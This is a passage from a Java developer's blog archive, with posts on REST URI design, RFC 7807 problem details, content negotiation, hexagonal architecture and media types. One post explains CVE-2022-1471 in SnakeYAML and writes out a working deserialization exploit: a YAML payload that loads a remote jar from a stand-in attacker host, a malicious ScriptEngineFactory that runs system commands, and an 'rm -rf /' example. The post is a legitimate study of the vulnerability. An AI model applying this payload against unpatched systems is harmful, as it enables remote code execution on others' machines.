Programming and Stuff - Michael Scharhag's Java development blog

URI design suggestions

2024-06-16T18:39:35Z

In this post, we will take a look at URI design for REST APIs. Please note that this is a very subjective topic. So you should take these as general suggestions rather than the definitive way to go.

On the one hand, URI design is important because it is hard to change URIs later without breaking client code. So it is good to think about URI design before building an API.

On the other hand, I think some people overemphasise the importance of URI design. You can easily spend a lot of time reading through endless web discussions about various details. Your goal is usually not to come up with the perfect URI design, but to build a pragmatic and consistent API that fulfils a specific business need.

It is usually much more important to be consistent than to be perfect. So if you choose a certain style of URI design, you should use it consistently, otherwise you may annoy your API users.

So here are some suggestions for better URI design.

Avoid case sensitivity, use lower case letters

Prefer /users/john instead of /Users/John.

Note that according to RFC 3986 the URI scheme and the host part are case-insensitive and should be normalised to lower case. However, the rest of the URI is case-sensitive. So HTTPS://API.My-Company.com is the same as https://api.my-company.com. But http://api.my-company.com/USERS is not the same as http://api.my-company.com/users.

To complicate matters further, certain pieces of technology may handle things differently. In short: There is no need for this extra complexity.
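To make the RFC 3986 rule a bit more concrete, here is a minimal Java sketch that lower-cases only the scheme and the host of a URI and leaves the path untouched. The class name UriCaseNormalizer is made up for this example, and the sketch only targets simple URIs like the ones shown above.

```java
import java.net.URI;
import java.net.URISyntaxException;
import java.util.Locale;

// Hypothetical helper for illustration; not part of any library.
final class UriCaseNormalizer {

    // Lower-cases the scheme and the host only. Path, query and fragment keep their case.
    static URI normalize(String raw) {
        URI uri = URI.create(raw);
        String scheme = uri.getScheme() == null ? null : uri.getScheme().toLowerCase(Locale.ROOT);
        String host = uri.getHost() == null ? null : uri.getHost().toLowerCase(Locale.ROOT);
        try {
            return new URI(scheme, uri.getUserInfo(), host, uri.getPort(),
                    uri.getPath(), uri.getQuery(), uri.getFragment());
        } catch (URISyntaxException e) {
            throw new IllegalArgumentException("Cannot normalise " + raw, e);
        }
    }
}
```

With this helper, HTTPS://API.My-Company.com and https://api.my-company.com end up as the same string, while /USERS and /users still differ.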

Prefer hyphens over spaces and underscores

You will probably need a way to separate multiple words within a URI. The most commonly used character for this is the hyphen (-).

Spaces in URIs need to be encoded as %20. So /weather report becomes /weather%20report, which is difficult for humans to read.

The underscore is another option, which is slightly less user friendly than the hyphen. The reason for this is simply that URIs are often underlined within text passages. This makes underscores difficult to distinguish from spaces.

Use hyphens over camel case

This is basically a corollary to the previous two points. If we want to remove case sensitivity, we cannot use camel case. So we need another way of separating words, which is to use the hyphen character. So /weatherReport becomes /weather-report.
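If existing names are in camel case (or use underscores or spaces), the conversion can be automated. The following is a small sketch under the assumption that names are simple ASCII identifiers; the class name PathSegments is made up, and acronyms such as HTTPServer are not split into separate words.

```java
import java.util.Locale;

// Hypothetical helper for illustration.
final class PathSegments {

    // Inserts a hyphen at each lower-case-to-upper-case boundary,
    // replaces runs of whitespace and underscores with a hyphen,
    // and finally lower-cases the result.
    static String toKebabCase(String segment) {
        return segment
                .replaceAll("([a-z0-9])([A-Z])", "$1-$2")
                .replaceAll("[\\s_]+", "-")
                .toLowerCase(Locale.ROOT);
    }
}
```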

Avoid trailing slashes

Use /cars instead of /cars/.

Trailing slashes confuse people; there is no reason why /cars/ should be different from /cars. A trailing slash is easy to forget and can cause hard-to-find errors in routing and web server configurations.

Avoid media types and file formats in URIs

Use /users/123 instead of /users/123.json.

The URI is used to describe a resource, not a data format. A single resource can be provided in different representations (aka formats). With HTTP we should use content negotiation to decide which resource representation should be returned by the server.

URIs describe resources not operations

With REST, we use URIs to identify resources (like users, posts, or the image with ID 1234). For operations (like getUsers or deleteImage) we use HTTP verbs.

So we should use


GET /users
POST /posts
DELETE /images/1234

instead of


POST /getUsers
GET /createPost?title=..
POST /images/1234/delete

Be consistent with plural and singular in resource names

In my opinion it does not matter whether you use /users/123 or /user/123 as long as you are consistent. However, the majority of people seem to prefer the plural version (/users/123).

If you go with plural, you should be consistent and only use singular names for true singleton resources.

A few examples:


/users        collection of all users
/users/123    single user with id 123 from the collection
/author       singleton resource, not a collection, there is only one author

Do not use query parameters to alter state

Query parameters are useful for various things, such as filtering and sorting collections. However, you should not use them to alter resource state.

Use the HTTP Verbs PUT, POST, DELETE or PATCH to alter resource state. If clients need to provide additional information use the request body.

For example, if you want to change the name of user 123 to John use something like


PUT /users/123
Content-Type: application/json
{
  "name": "John"
}

instead of


PUT /users/123?name=john

See POST vs PUT vs PATCH for more details.
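On the client side, such a request could be built with the HTTP client that ships with Java 11 and later. This is only a sketch: the class name RenameUserRequest and the base URL parameter are assumptions, and the JSON body is assembled by hand, which only works for names that need no JSON escaping.

```java
import java.net.URI;
import java.net.http.HttpRequest;

// Hypothetical helper for illustration.
final class RenameUserRequest {

    // Puts the new name into the request body instead of a query parameter.
    static HttpRequest build(String baseUrl, long userId, String newName) {
        String body = "{\"name\": \"" + newName + "\"}";
        return HttpRequest.newBuilder(URI.create(baseUrl + "/users/" + userId))
                .header("Content-Type", "application/json")
                .PUT(HttpRequest.BodyPublishers.ofString(body))
                .build();
    }
}
```

The resulting request can then be sent with HttpClient.send(..). Note that the URI contains no query string; all state changes travel in the body.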

URIs are hierarchical

URIs identify resources hierarchically. Sub-resources usually have a 1:n or 1:1 relationship with the parent resource.

For example, suppose we have an application that allows users to join groups. Within groups, users can create and comment on posts. So a post belongs to exactly one group and a comment belongs to exactly one post. To represent this relationship, we can come up with the following URI hierarchy:


/groups
returns the collection of all available groups

/groups/111
returns details about a specific group (here 111)

/groups/111/posts
returns the collection of posts for group 111

/groups/111/posts/222
returns details about post 222 in group 111

/groups/111/posts/222/comments
returns the comments for post 222 in group 111

If there is no clear hierarchy, query parameters can be a good option.

Suppose we want to provide a route planning service. To get a route from Berlin to Paris, we could use /route/berlin/paris. However, this implies that the destination (paris) is a sub-resource of the start location (berlin), which does not seem right.

A better way is to use query parameters. For example:


/route?from=berlin&to=paris
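When such a URI is built in code, the parameter values should be encoded. Here is a minimal sketch; the class name RouteUris is made up. Note that URLEncoder applies HTML form encoding, so a space becomes a plus sign rather than %20.

```java
import java.net.URI;
import java.net.URLEncoder;
import java.nio.charset.StandardCharsets;

// Hypothetical helper for illustration.
final class RouteUris {

    // Builds /route?from=..&to=.. with form-encoded parameter values.
    static URI route(String from, String to) {
        String query = "from=" + URLEncoder.encode(from, StandardCharsets.UTF_8)
                + "&to=" + URLEncoder.encode(to, StandardCharsets.UTF_8);
        return URI.create("/route?" + query);
    }
}
```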

Constructing a malicious YAML file for SnakeYAML (CVE-2022-1471)

2023-06-06T20:31:46Z

In this post we will take a closer look at SnakeYAML and CVE-2022-1471.

SnakeYAML is a popular Java library for parsing YAML files. For example, Spring Boot uses SnakeYAML to parse YAML configuration files.

In late 2022, a critical vulnerability was discovered in SnakeYAML (referred to as CVE-2022-1471). This allowed an attacker to perform remote code execution by providing a malicious YAML file. The problem was fixed in SnakeYAML 2.0, released in February 2023.

I recently looked into this vulnerability and learned a few things that I'll try to break down in this post.

Parsing YAML files with SnakeYAML

Before we look at the actual security issue, let us take a quick look at how SnakeYAML is actually used in a Java application.

Suppose we have the following YAML file named person.yml:


person:
  firstname: john
  lastname: doe
  address:
    street: fooway 42
    city: baz town

In our Java code we can parse this YAML file with SnakeYAML like this:


Yaml yaml = new Yaml();
FileInputStream fis = new FileInputStream("/path/to/person.yml");
Map<String, Object> parsed = yaml.load(fis);

Map<String, Object> person = (Map<String, Object>) parsed.get("person");
person.get("firstname");  // "john"
person.get("lastname");   // "doe"
person.get("address");    // another map with keys "street" and "city"

yaml.load(fis) returns a Map<String, Object> instance that we can navigate through to get the values defined in the YAML file.

Mapping YAML content to objects

Unfortunately, working with maps is usually not very pleasant. So SnakeYAML provides several ways to map YAML content to Java objects.

One way is to use the !! syntax to set a Java type within a YAML object:


person:
  !!demo.Person
  firstname: john
  lastname: doe
  address:
    street: fooway 42
    city: baz town

This tells SnakeYAML to map the contents of the person object to the demo.Person Java class, which looks like this:


public class Person {
    private String firstname;
    private String lastname;
    private Address address; // has getter and setter for street and city

    // getter and setter
}

We can now parse the YAML file and get the person object with the mapped YAML values like this:


Map<String, Object> parsed = yaml.load(fis);
Person person = (Person) parsed.get("person");

SnakeYAML now creates a new Person object using the default constructor and uses setters to set the values defined in the YAML file. We can also instruct SnakeYAML to use constructor parameters instead of setters to set values.

For example, suppose we have the following simple Email value object:


public class Email {
    private String value;

    public Email(String value) {
        this.value = value;
    }

    // getter
}

Within the YAML file, we can tell SnakeYAML to create an Email object by enclosing the constructor argument in square brackets:


person:
  firstname: john
  lastname: doe
  email: !!demo.Email [ john@doe.com ]

Where is the security issue?

What we have seen so far is really all we need to run malicious code from a YAML file. SnakeYAML allows us to create classes, pass constructor parameters and call setters from a provided YAML file.

Assume for a moment that there is a RunSystemCommand class available in the class path. This class executes the system command passed in the constructor as soon as it is created. We could then provide the following YAML file:


foo: !!bad.code.RunSystemCommand [ rm -rf / ]

Which would run the rm -rf / system command right after it is instantiated by SnakeYAML.

Obviously this is a bit too simple, as such a class is unlikely to exist in the classpath. Also remember that we can only control constructors and setters through the YAML file. We cannot call arbitrary methods.
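To get a feeling for why this matters, the following sketch mimics the idea with plain reflection: a class is looked up by name and its single-argument constructor is called. This is not SnakeYAML's actual implementation, only an illustration of the principle. The RecordingCommand class is a harmless stand-in for the hypothetical RunSystemCommand; it merely records the command instead of executing it.

```java
import java.lang.reflect.Constructor;
import java.util.ArrayList;
import java.util.List;

// Illustration only; all names in this class are made up.
final class TagInstantiationSketch {

    // Collects the "commands" that would have been executed.
    static final List<String> SIDE_EFFECTS = new ArrayList<>();

    // Harmless stand-in for RunSystemCommand: the constructor has a side effect.
    public static final class RecordingCommand {
        public RecordingCommand(String command) {
            SIDE_EFFECTS.add(command);
        }
    }

    // Roughly what a tag like "!!some.Type [ argument ]" asks a parser to do:
    // resolve the class by name and call a matching constructor.
    static Object instantiate(String className, String argument) {
        try {
            Class<?> type = Class.forName(className);
            Constructor<?> constructor = type.getConstructor(String.class);
            return constructor.newInstance(argument);
        } catch (ReflectiveOperationException e) {
            throw new IllegalStateException("Cannot instantiate " + className, e);
        }
    }
}
```

The caller of instantiate(..) never references RecordingCommand directly. The class name comes from input data, and the side effect happens as soon as the constructor runs.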

However, there are some interesting classes available in the standard Java library that can be used. A very promising combination is ScriptEngineManager together with URLClassLoader. We will now learn a bit more about these two classes before we integrate them into a YAML file.

Loading remote code via URLClassLoader

URLClassLoader is a Java ClassLoader that can load classes and resources from jar files located at a specified URL. We can create a URLClassLoader like this:


URL[] urls = { new URL("http://attacker.com/malicious-code.jar") };
URLClassLoader classLoader = new URLClassLoader(urls);

URLClassLoader takes an array of URLs as constructor parameter. Here we pass a single URL pointing to a jar file on a remote server controlled by the attacker. Our classLoader instance can now be used to load classes from the remote jar file.

If you are curious about how to load a class from a Classloader and use it via reflection, here is a simple example. However, this is not necessary for our SnakeYAML experiment.


// load class foo.bar.BadCode using the classLoader
Class<?> loadedClass = classLoader.loadClass("foo.bar.BadCode");

// create a new instance of foo.bar.BadCode using the default constructor
Object instance = loadedClass.getDeclaredConstructor().newInstance();

// run the method runMaliciousCode() on our new instance
Method runMaliciousCode = loadedClass.getMethod("runMaliciousCode");
runMaliciousCode.invoke(instance);

Using ScriptEngineManager to run code for us

ScriptEngineManager is another standard Java library class. It implements a discovery and instantiation mechanism for Java script engine support. ScriptEngineManager uses the Java Service Provider mechanism to discover and instantiate available ScriptEngineFactory classes.

The ClassLoader used by ScriptEngineManager can be passed as a constructor parameter:


URL[] urls = { new URL("http://attacker.com/malicious-code.jar") };
URLClassLoader classLoader = new URLClassLoader(urls);
new ScriptEngineManager(classLoader);

Here, the newly created ScriptEngineManager will look for ScriptEngineFactory implementations in our attacker-controlled remote jar. And more dangerously: It will instantiate eligible classes from that jar, giving the attacker the ability to run their own code.

But what content must be provided in the remote jar file?

We start by creating a malicious implementation of ScriptEngineFactory:


package foo.bar;

public class BadScriptEngineFactory implements ScriptEngineFactory {
    @Override
    public String getEngineName() {
        try {
            Runtime.getRuntime().exec("calc");
        } catch (IOException e) {
            throw new RuntimeException(e);
        }
        return null;
    }

    // empty stubs for other interface methods
}

The first method that ScriptEngineManager calls after instantiating a ScriptEngineFactory is getEngineName(). So we use this method to execute our malicious code. In this example, we will simply run the calc system command, which will start the calculator on a Windows system. This is a simple proof that we can run a system command from the provided jar file.

As mentioned earlier, ScriptEngineManager uses the Java Service Provider mechanism to find classes that implement the ScriptEngineFactory interface.

So we need to create a service provider configuration for our ScriptEngineFactory. We do this by creating a file called javax.script.ScriptEngineFactory in the META-INF/services directory. This file must contain the fully qualified name of our ScriptEngineFactory:


foo.bar.BadScriptEngineFactory

We then package the class and configuration file into a jar file called malicious-code.jar. The final layout inside the jar file looks like this:

malicious-code.jar
- META-INF
  - services
    - javax.script.ScriptEngineFactory
  - MANIFEST.MF
- foo
  - bar
    - BadScriptEngineFactory.class

We can now put this jar file on a server and make it available to the URLClassLoader used by the ScriptEngineManager.

To recap the snippet shown earlier:


URL[] urls = { new URL("http://attacker.com/malicious-code.jar") };
URLClassLoader classLoader = new URLClassLoader(urls);
new ScriptEngineManager(classLoader);

ScriptEngineManager should now detect the BadScriptEngineFactory class within the malicious-code.jar file. Once instantiated, it calls the getEngineName() method, which executes the calc system command. So running this code on a Windows system should open the Windows Calculator.

Constructing a malicious YAML file

Now we know enough to return to our original goal: constructing a malicious YAML file for SnakeYAML. As you may have noticed, the previous snippet only included constructor calls and the construction of an array. Both of these can be expressed within a YAML file.

So the final YAML file looks like this:


person: !!javax.script.ScriptEngineManager [
    !!java.net.URLClassLoader [[
        !!java.net.URL [http://attacker.com/malicious-code.jar]
    ]]
]

We create a simple person YAML object. For the value we use the !! syntax we saw earlier to create a ScriptEngineManager.

As a constructor parameter we pass a URLClassLoader with a URL pointing to our malicious jar file. Notice that we open two square brackets after URLClassLoader. One to indicate that a constructor argument follows and a second to define an array.

When this YAML file is parsed with a vulnerable version of SnakeYAML on a Windows system, the calculator opens. This proves that an attacker is able to run code and execute system commands by providing a malicious YAML file.

A standardized error format for HTTP responses

2022-08-10T20:42:44Z

HTTP uses status codes to indicate the result of the server's attempt to satisfy the request. In case the server is unable to process the request we can choose from a variety of HTTP error codes.

Unfortunately status codes alone often do not provide enough information for API clients. For example, a server might respond with the status code 400 (Bad Request) to indicate the client sent an invalid request. Wouldn't it be nice if the response body would tell us what specific part of the request was invalid or how to resolve the problem?

Status codes are used to define higher level error classes while error details are usually part of the response body. Many APIs use a custom error format for response bodies to provide additional problem information. However, there is also a standard that can help us here, defined in RFC 7807.

RFC 7807 defines a data model for problem details in JSON and XML. Before coming up with a new generic fault or error response format for your API, it might be worth looking into RFC 7807. However, it is absolutely fine to use your own domain-specific format if this fits your application better.

RFC 7807: Problem Details for HTTP APIs

An HTTP response using RFC 7807 might look like this:


HTTP/1.1 400 Bad Request
Content-Type: application/problem+json
Content-Language: en

{
    "type": "https://api.my-cool-example.com/problems/required-field-missing",
    "title": "Required field is missing",
    "detail": "Article with id 1234 cannot be updated because the required field 'title' is missing",
    "status": 400,
    "instance": "/articles/1234",
    "field": "title"
}

As usual, the HTTP status code (400, Bad Request) gives us a broad indication of the problem. Notice the response Content-Type of application/problem+json. This tells us the response contains an RFC 7807 compliant body. When using XML instead of JSON the Content-Type application/problem+xml is used.

A problem details JSON response can have the following members:

type (string) - A URI reference that identifies the problem type.
title (string) - A short human-readable summary of the problem type. It should not change between multiple occurrences of the same problem type, except for purposes of localization.
status (number) - The HTTP status code generated by the origin server.
detail (string) - A human-readable description of this specific problem occurrence.
instance (string) - A URI that identifies the resource related to this specific problem occurrence.

All fields are optional. However, you should at least provide a type value as this is used by consumers to identify the specific problem type. Consumers should not parse the title or detail fields.

Problem types

Problem types are used to identify specific problems. A problem type must document:

A type URI (that is used in the type field of the response).
A title that describes the problem (used in the title field of the response).
The HTTP status code it is used with.

The type URI should resolve to human-readable documentation of the problem (e.g. an HTML document). This URI should be under your control and stable over time.

Problem types may also specify the use of a Retry-After response header if appropriate.

RFC 7807 reserves one special URI as a problem type: about:blank. The problem type about:blank can be used if the problem has no additional semantics besides that of the HTTP status code. In this case, the title should be the same as the HTTP status phrase for that code (e.g. Bad Request for HTTP status 400).

Extension members

Problem types may extend the problem details object with additional members to provide additional information.

The field member from the example response shown above is an example of such an extension member. It belongs to the required-field-missing problem type and indicates the missing field. A consumer might parse this member to construct an appropriate error message for the end-user.
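On the server side, a problem details body including an extension member could be assembled like this. This is a minimal sketch using only the standard library; the class name ProblemDetails and its methods are made up, and the hand-written JSON rendering only escapes quotes and backslashes. In a real application you would more likely use a JSON library or the support offered by your web framework.

```java
import java.util.LinkedHashMap;
import java.util.Map;
import java.util.StringJoiner;

// Hypothetical model class for illustration.
final class ProblemDetails {

    // LinkedHashMap keeps the members in insertion order.
    private final Map<String, Object> members = new LinkedHashMap<>();

    ProblemDetails(String type, String title, int status) {
        members.put("type", type);
        members.put("title", title);
        members.put("status", status);
    }

    ProblemDetails detail(String detail) {
        members.put("detail", detail);
        return this;
    }

    ProblemDetails instance(String instance) {
        members.put("instance", instance);
        return this;
    }

    // Adds a problem-type-specific extension member, like "field" in the example.
    ProblemDetails extension(String name, String value) {
        members.put(name, value);
        return this;
    }

    // Renders the members as a compact JSON object.
    String toJson() {
        StringJoiner json = new StringJoiner(",", "{", "}");
        for (Map.Entry<String, Object> member : members.entrySet()) {
            Object value = member.getValue();
            String rendered = value instanceof Number ? value.toString() : quote(value.toString());
            json.add(quote(member.getKey()) + ":" + rendered);
        }
        return json.toString();
    }

    private static String quote(String text) {
        return "\"" + text.replace("\\", "\\\\").replace("\"", "\\\"") + "\"";
    }
}
```

The response should then be sent with the Content-Type application/problem+json and the matching HTTP status code.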

Conclusion

HTTP status codes alone are often not enough to provide a meaningful problem description.

RFC 7807 defines a standardized format for more detailed problem descriptions within the body of an HTTP response. Before coming up with just another custom error response format, it might be a good idea to look at the RFC 7807 problem format.

HTTP - Content negotiation

2021-11-22T18:24:34Z

With HTTP, resources are identified using URIs. And a uniquely identified resource might support multiple resource representations. A representation is a specific form of a particular resource.

For example:

an HTML page /index.html might be available in different languages
product data located at /products/123 can be served in JSON, XML or CSV
an avatar image /user/avatar might be available in JPEG, PNG and GIF formats

In all these cases one underlying resource has multiple different representations.

Content negotiation is the mechanism used by clients and servers to decide which representation should be used.

Server-driven and agent-driven content negotiation

We can differentiate between server-driven and agent-driven content negotiation.

With server-driven content negotiation the client tells the server which representations are preferable. The server then picks the representation that best fits the client's needs.

When using agent-driven content negotiation the server tells the client which representations are available. The client then picks the best matching option.

In practice, server-driven negotiation is used almost exclusively. Unfortunately, there is no standardized format for agent-driven negotiation. Agent-driven negotiation is also usually worse for performance, as it requires an additional request/response round trip. In the rest of this article we will therefore focus on server-driven negotiation.

Accept headers

With server-driven negotiation the client uses headers to indicate supported content formats. A server-side algorithm then uses these headers to decide which resource representation should be returned.

Most commonly used is the Accept header, which communicates the media types preferred by the client. For example, consider the following simple HTTP request containing an Accept header:


GET /monthly-report
Accept: text/html; q=1.0, text/*; q=0.8

The header tells the server that the client understands HTML (media type text/html) and other text-based formats (media type text/*).

text/* indicates that all subtypes of the text type are supported. To indicate that all media types are supported we can use */*.

In this example HTML is preferred over other text based formats because it has a higher quality factor (q).

Ideally a server would respond with an HTML document to this request. For example:


HTTP/1.1 200 OK
Content-Type: text/html

<html>
    <body>
        <h1>Monthly report</h1>
        ...
    </body>
</html>

If returning HTML is not feasible, the server can also respond with another text based format, like text/plain:


HTTP/1.1 200 OK
Content-Type: text/plain

Monthly report
Bla bli blu
...
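The server-side selection can be sketched in a few lines of Java. This is a simplified illustration and not a complete implementation of the HTTP rules: the class name AcceptNegotiator is made up, media type parameters other than q are ignored, and malformed headers are not handled. For each representation the server can produce, the most specific matching media range determines the quality value, and the representation with the highest quality value wins.

```java
import java.util.List;
import java.util.Optional;

// Hypothetical helper for illustration.
final class AcceptNegotiator {

    // Returns the available media type with the highest quality value,
    // or an empty Optional if none of them is acceptable.
    static Optional<String> select(String acceptHeader, List<String> available) {
        String best = null;
        double bestQuality = 0.0;
        for (String candidate : available) {
            double quality = qualityFor(acceptHeader, candidate);
            if (quality > bestQuality) {
                best = candidate;
                bestQuality = quality;
            }
        }
        return Optional.ofNullable(best);
    }

    // Looks up the q value of the most specific media range matching the media type.
    static double qualityFor(String acceptHeader, String mediaType) {
        double quality = 0.0;
        int bestSpecificity = -1;
        for (String element : acceptHeader.split(",")) {
            String[] parts = element.trim().split(";");
            double q = 1.0; // q defaults to 1.0 if not given
            for (int i = 1; i < parts.length; i++) {
                String parameter = parts[i].trim();
                if (parameter.startsWith("q=")) {
                    q = Double.parseDouble(parameter.substring(2).trim());
                }
            }
            int specificity = specificity(parts[0].trim(), mediaType);
            if (specificity > bestSpecificity) {
                bestSpecificity = specificity;
                quality = q;
            }
        }
        return quality;
    }

    // 2 = exact match, 1 = type/* match, 0 = */* match, -1 = no match
    private static int specificity(String range, String mediaType) {
        if (range.equals("*/*")) {
            return 0;
        }
        if (range.endsWith("/*")) {
            String typePrefix = range.substring(0, range.length() - 1); // e.g. "text/"
            return mediaType.regionMatches(true, 0, typePrefix, 0, typePrefix.length()) ? 1 : -1;
        }
        return range.equalsIgnoreCase(mediaType) ? 2 : -1;
    }
}
```

For the Accept header from the example, a server offering text/plain and text/html would pick text/html, and a server offering only text/plain would fall back to text/plain.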

Besides the Accept header, we can also use the Accept-Language and Accept-Encoding headers. Accept-Language indicates the language preference of the client while Accept-Encoding defines the acceptable content encodings.

Of course all these headers can be used together. For example:


GET /monthly-report
Accept: text/html
Accept-Language: en-US; q=1.0, en; q=0.9, fr; q=0.4
Accept-Encoding: gzip, br

Here the client indicates that it prefers:

an HTML document
US English (q=1.0), although other English variants are also fine (q=0.9); if English is not available, French will do (q=0.4)
gzip or Brotli (br) content encoding

An acceptable response might look like this:


HTTP/1.1 200 OK
Content-Type: text/html
Content-Language: en
Content-Encoding: gzip

<gzipped html document>

What if the server cannot return an acceptable response?

If the server is unable to fulfill the client's preferences the HTTP status code 406 (Not Acceptable) can be returned. This status code indicates that the server is unable to produce a response matching the client's preferences.

Depending on the situation it might also be viable to return a response that does not exactly match the client's preferences. For example, assume no language provided in the Accept-Language header is supported by the server. In this case, it can still be a valid option to return a response using a predefined default language. This might be more useful for the client than nothing. In this case, the client can look at the Content-Language header of the response and decide whether to use the response or ignore it.
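The language fallback can be sketched with the language range support in java.util.Locale. The class name LanguageNegotiator and the default language parameter are assumptions for this example. Spaces are removed before parsing, and an empty header value is not handled.

```java
import java.util.List;
import java.util.Locale;

// Hypothetical helper for illustration.
final class LanguageNegotiator {

    // Returns the best supported language tag for the given Accept-Language value,
    // or the default language if nothing matches.
    static String select(String acceptLanguage, List<String> supported, String defaultLanguage) {
        // parse(..) returns the ranges sorted by descending quality value
        List<Locale.LanguageRange> ranges =
                Locale.LanguageRange.parse(acceptLanguage.replace(" ", ""));
        String match = Locale.lookupTag(ranges, supported);
        return match != null ? match : defaultLanguage;
    }
}
```

The selected tag can then be written to the Content-Language header of the response, so the client can see which language it actually received.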

Content negotiation in REST APIs

For REST APIs it can be a viable option to support more than one standard representation for resources. For example, with content negotiation we can support JSON and XML and let the client decide which one to use.

CSV can also be an interesting option to consider in certain situations as the response can directly be viewed with tools like Excel. For example, consider the following request:


GET /users
Accept: text/csv

Instead of returning a JSON (or XML) collection, the server now can respond with a list of users in CSV format.


HTTP/1.1 200 OK
Content-Type: text/csv

Id;Username;Email
1;john;john.doe@example.com
2;anna91;anna91@example.com

Interested in more REST related articles? Have a look at my REST API design page.

Avoid leaking domain logic

2021-11-01T12:23:49Z

Many software architectures try to separate domain logic from other parts of the application. To follow this practice we always need to know what actually is domain logic and what is not. Unfortunately this is not always that easy to separate. If we get this decision wrong, domain logic can easily leak into other components and layers.

We will go through this problem by looking at examples using a hexagonal application architecture. If you are not familiar with hexagonal architecture (also called ports and adapters architecture) you might be interested in the previous post about the transition from a traditional layered architecture to a hexagonal architecture.

Assume a shop system that publishes new orders to a messaging system (like Kafka). Our product owner now tells us that we have to listen for these order events and persist the corresponding order in the database.

Using hexagonal architecture the integration with a messaging system is implemented within an adapter. So, we start with a simple adapter implementation that listens for Kafka events:


@AllArgsConstructor
public class KafkaAdapter {
    private final SaveOrderUseCase saveOrderUseCase;

    @KafkaListener(topic = ...)
    public void onNewOrderEvent(NewOrderKafkaEvent event) {
        Order order = event.getOrder();
        saveOrderUseCase.saveOrder(order);
    }
}

In case you are not familiar with the @AllArgsConstructor annotation from Project Lombok: It generates a constructor which accepts each field (here saveOrderUseCase) as a parameter.

The adapter delegates the saving of the order to a UseCase implementation.

UseCases are part of our domain core and implement domain logic, together with the domain model. Our simple example UseCase looks like this:


@AllArgsConstructor
public class SaveOrderUseCase {
    private final SaveOrderPort saveOrderPort;

    public void saveOrder(Order order) {
        saveOrderPort.saveOrder(order);
    }
}

Nothing special here. We simply use an outgoing Port interface to persist the passed order.

While the shown approach might work fine, we have a significant problem here: Our business logic has leaked into the Adapter implementation. Maybe you are wondering: what business logic?

We have a simple business rule to implement: Every time a new order is retrieved it should be persisted. In our current implementation this rule is implemented by the adapter while our business layer (the UseCase) only provides a generic save operation.

Now assume, after some time, a new requirement arrives: Every time a new order is retrieved, a message should be written to an audit log.

With our current implementation we cannot write the audit log message within SaveOrderUseCase. As the name suggests the UseCase is for saving an order and not for retrieving a new order and therefore might be used by other components. So, adding the audit log message here might have undesired side-effects.

The solution is simple: We write the audit log message in our adapter:


@AllArgsConstructor
public class KafkaAdapter {

    private final SaveOrderUseCase saveOrderUseCase;
    private final AuditLog auditLog;

    @KafkaListener(topic = ...)
    public void onNewOrderEvent(NewOrderKafkaEvent event) {
        Order order = event.getOrder();
        saveOrderUseCase.saveOrder(order);
        auditLog.write("New order retrieved, id: " + order.getId());
    }
}

And now we have made it worse. Even more business logic has leaked into the adapter.

If the auditLog object writes messages into a database, we might also have screwed up transaction handling, which is usually not handled in an incoming adapter.

Using more specific domain operations

The core problem here is the generic SaveOrderUseCase. Instead of providing a generic save operation to adapters we should provide a more specific UseCase implementation.

For example, we can create a NewOrderRetrievedUseCase that accepts newly retrieved orders:


@AllArgsConstructor
public class NewOrderRetrievedUseCase {
    private final SaveOrderPort saveOrderPort;
    private final AuditLog auditLog;

    @Transactional
    public void onNewOrderRetrieved(Order newOrder) {
        saveOrderPort.saveOrder(newOrder);
        auditLog.write("New order retrieved, id: " + newOrder.getId());
    }
}

Now both business rules are implemented within the UseCase. Our adapter implementation is now simply responsible for mapping incoming data and passing it to the use case:


@AllArgsConstructor
public class KafkaAdapter {
    private final NewOrderRetrievedUseCase newOrderRetrievedUseCase;

    @KafkaListener(topic = ...)
    public void onNewOrderEvent(NewOrderKafkaEvent event) {
        NewOrder newOrder = event.toNewOrder();
        newOrderRetrievedUseCase.onNewOrderRetrieved(newOrder);
    }
}

This change only seems to be a small difference. However, for future requirements, we now have a specific location to handle incoming orders in our business layer. Otherwise, chances are high that with new requirements we leak more business logic into places where it should not be located.

Leaks like this happen especially often with too generic create, save/update and delete operations in the domain layer. So, try to be very specific when implementing business operations.
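A nice side effect of a specific use case is that both business rules can be checked together without any messaging infrastructure. The following self-contained sketch shows this in plain Java. The shapes of Order, SaveOrderPort and AuditLog are assumptions made for this example (they are not shown in this post), and Lombok and @Transactional are left out to keep it runnable without dependencies.

```java
import java.util.ArrayList;
import java.util.List;

// Self-contained illustration; the nested types are simplified assumptions.
final class NewOrderRetrievedSketch {

    static final class Order {
        private final String id;

        Order(String id) {
            this.id = id;
        }

        String getId() {
            return id;
        }
    }

    // Outgoing ports of the domain core
    interface SaveOrderPort {
        void saveOrder(Order order);
    }

    interface AuditLog {
        void write(String message);
    }

    // The use case owns both business rules: persist the order and write the audit log.
    static final class NewOrderRetrievedUseCase {
        private final SaveOrderPort saveOrderPort;
        private final AuditLog auditLog;

        NewOrderRetrievedUseCase(SaveOrderPort saveOrderPort, AuditLog auditLog) {
            this.saveOrderPort = saveOrderPort;
            this.auditLog = auditLog;
        }

        void onNewOrderRetrieved(Order newOrder) {
            saveOrderPort.saveOrder(newOrder);
            auditLog.write("New order retrieved, id: " + newOrder.getId());
        }
    }

    public static void main(String[] args) {
        // In-memory fakes replace the database and the audit log
        List<Order> savedOrders = new ArrayList<>();
        List<String> auditMessages = new ArrayList<>();

        NewOrderRetrievedUseCase useCase =
                new NewOrderRetrievedUseCase(savedOrders::add, auditMessages::add);
        useCase.onNewOrderRetrieved(new Order("42"));

        System.out.println(savedOrders.size() + " order(s) saved, audit log: " + auditMessages);
    }
}
```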

Media types and the Content-Type header

2021-10-06T21:44:10Z

A media type (formerly known as MIME type) is an identifier for file formats and format contents. Media types are used by different internet technologies like e-mail or HTTP.

Media types consist of a type and a subtype. They can optionally contain a suffix and one or more parameters. Media types follow this syntax:


type "/" [tree "."] subtype ["+" suffix]* [";" parameter]

For example the media type for JSON documents is:


application/json

It consists of the type application with the subtype json.

An HTML document with UTF-8 encoding can be expressed as:


text/html; charset=UTF-8

Here we have the type text, the subtype html and a parameter charset=UTF-8 indicating UTF-8 character encoding.

A suffix can be used to specify the underlying format of a media type. For example, SVG images use the media type:


image/svg+xml

The type is image, svg is the subtype and xml the suffix. The suffix tells us that the SVG file format is based on XML.

Note that subtypes can be organized in a hierarchical tree structure. For example, the binary format used by Apache Thrift uses the following media type:


application/vnd.apache.thrift.binary

vnd is a standardized prefix that tells us this is a vendor specific media type.
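To see how these parts fit together, here is a small parser sketch that splits a media type string into type, subtype, suffix and parameters, following the terminology used above. The class name MediaTypeParts is made up, and the sketch does not validate the input against the full grammar (for example, quoted parameter values are not handled).

```java
import java.util.LinkedHashMap;
import java.util.Locale;
import java.util.Map;

// Hypothetical value class for illustration.
final class MediaTypeParts {
    final String type;
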